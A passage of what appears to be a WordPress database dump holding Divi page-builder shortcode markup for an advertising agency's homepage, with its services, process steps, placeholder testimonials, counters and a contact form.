body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-09 20:49:31','2020-07-09 20:49:31','',134,'https://52.66.212.87/2020/07/09/134-revision-v1/',0,'revision','',0),(304,1,'2020-07-09 20:51:55','2020-07-09 20:51:55','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" 